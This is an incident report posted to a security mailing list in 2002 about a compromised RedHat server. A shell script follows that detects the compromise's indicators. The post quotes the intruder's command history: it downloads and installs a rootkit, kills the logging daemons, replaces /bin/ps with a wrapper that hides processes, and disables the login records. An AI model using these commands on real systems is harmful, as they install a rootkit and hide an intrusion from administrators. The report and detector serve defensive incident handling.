Sloppy compromise
From: switched (security-mail@q-east.net) Date: 03/13/02
From: "switched" <security-mail@q-east.net> To: <incidents@securityfocus.com> Date: Wed, 13 Mar 2002 11:23:47 -0600
I was dealing with a compromised server (RedHat 6.1) yesterday and it was
utter crap. After logging into the server the first thing I did was cat
/etc/passwd. At the bottom of /etc/passwd was the user "liq2" with a uid of
0. Not so clean. The user "liq" had a uid of 501 I believe. Both users
had home directories in /home... so there was a /home/liq and /home/liq2.
/home/liq contained a program, along with source, that scanned /24's for
Cisco devices. /home/liq2 had an untampered .bash_history with this in it:
wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login;
pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd
/home/liq; rm -rf login.tar.gz; wget
ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd
wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2;
rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd;
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755
/bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp
/var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp
Very very sloppy... But you can also see this in there...
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps
The attacker moved /bin/ps to /bin/xps and then echoed a script to ps which
removes in.telnetd from showing up and changes the name of xps to ps. Yes,
very crappy. You have to be 2 years old to not catch that, especially when
sed shows up in the process list every time you type "ps". Moving right
along, I soon noticed I was on pty/2 but who showed me as the only user...
interesting... Ok, I typed xps and noticed that "./wu" was running on
pty/1! Odd... And then I noticed the system load average jump from .2 to
2.0! Now I noticed that "./wu" wasn't running but "./pscan" was now
running. At this point in time I decided enough was enough and had the
machine unplugged. Later on I went to look at it again from the console and
noticed that these IPs had connected with telnet:
212.199.3.193
212.199.12.34
212.199.173.26
They also weren't smart enough to remove or alter anything in /var/log/ and
"last" showed them logging in with ftp and telnet! DOH! Further
investigation found "wu" and "pscan" in /tmp/.or/
So has anyone else seen a compromise such as this? From what little
investigating I did this is all I found modified... Looks like script
kiddies were at work ;).
-switched
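An added example, not part of switched's post: a small sh script that checks a filesystem for the indicators the message describes (an extra uid-0 account in /etc/passwd, /bin/ps replaced by a shell-script wrapper, the process names that wrapper hides, and utmp/wtmp set to mode 0). The function names and the sample files are constructed for this example; point the functions at copies from a suspect host to use them for real.

```shell
#!/bin/sh
# Added example (not from the original post). Paths are parameters so the
# checks can run against files copied off a suspect system; the sample
# files at the bottom are constructed here purely for demonstration.

# Names of uid-0 accounts other than root in a passwd-format file ($1).
extra_uid0_users() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# "binary" if $1 starts with the ELF magic 7f 45 4c 46, otherwise "script".
# A genuine ps is an ELF executable; the post's replacement was a sh one-liner.
ps_kind() {
    if [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]; then
        echo binary
    else
        echo script
    fi
}

# Process names a wrapper script ($1) filters out with "grep -vi '<name>'".
hidden_names() {
    grep -o "grep -vi '[^']*'" "$1" | sed "s/grep -vi '\(.*\)'/\1/"
}

# The nine permission characters ls shows for $1, "---------" after chmod 0.
login_record_mode() {
    ls -ld "$1" | cut -c2-10
}

# --- constructed sample files mirroring what the post found ---
SAMPLE=$(mktemp -d)
printf 'root:x:0:0:root:/root:/bin/bash\nliq:x:501:501::/home/liq:/bin/bash\nliq2:x:0:0::/home/liq2:/bin/bash\n' > "$SAMPLE/passwd"
# the wrapper exactly as the attacker echoed it into /bin/ps
printf '%s\n' "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g" > "$SAMPLE/ps"
printf '\177ELF\002\001\001' > "$SAMPLE/xps"   # first bytes of a real ELF binary
: > "$SAMPLE/utmp"; chmod 0 "$SAMPLE/utmp"

echo "uid-0 accounts besides root: $(extra_uid0_users "$SAMPLE/passwd")"
echo "ps is a $(ps_kind "$SAMPLE/ps"), xps is a $(ps_kind "$SAMPLE/xps")"
echo "names hidden by the wrapper: $(hidden_names "$SAMPLE/ps" | tr '\n' ' ')"
echo "utmp mode: $(login_record_mode "$SAMPLE/utmp")"
```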
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com